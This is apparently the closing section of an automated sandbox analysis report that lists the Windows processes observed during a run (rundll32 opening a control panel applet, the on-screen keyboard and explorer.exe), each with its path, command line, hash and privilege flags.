                                                                                                                                                                                                  Imagebase:0x7ff7f9810000
                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                                  Start time:17:39:04
                                                                                                                                                                                                  Start date:14/01/2025
                                                                                                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,Control_RunDLL C:\Windows\System32\main.cpl,@1 ,
                                                                                                                                                                                                  Imagebase:0x7ff6bf020000
                                                                                                                                                                                                  File size:71'680 bytes
                                                                                                                                                                                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                                  Start time:17:39:10
                                                                                                                                                                                                  Start date:14/01/2025
                                                                                                                                                                                                  Path:C:\Windows\System32\osk.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Windows\system32\osk.exe"
                                                                                                                                                                                                  Imagebase:0x7ff7d2060000
                                                                                                                                                                                                  File size:653'312 bytes
                                                                                                                                                                                                  MD5 hash:745F2DF5BEED97B8C751DF83938CB418
                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                  Start time:17:39:11
                                                                                                                                                                                                  Start date:14/01/2025
                                                                                                                                                                                                  Path:C:\Windows\System32\osk.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Windows\system32\osk.exe"
                                                                                                                                                                                                  Imagebase:0x7ff7d2060000
                                                                                                                                                                                                  File size:653'312 bytes
                                                                                                                                                                                                  MD5 hash:745F2DF5BEED97B8C751DF83938CB418
                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                  Start time:17:39:11
                                                                                                                                                                                                  Start date:14/01/2025
                                                                                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                  Imagebase:0x7ff71ebd0000
                                                                                                                                                                                                  File size:5'141'208 bytes
                                                                                                                                                                                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  No disassembly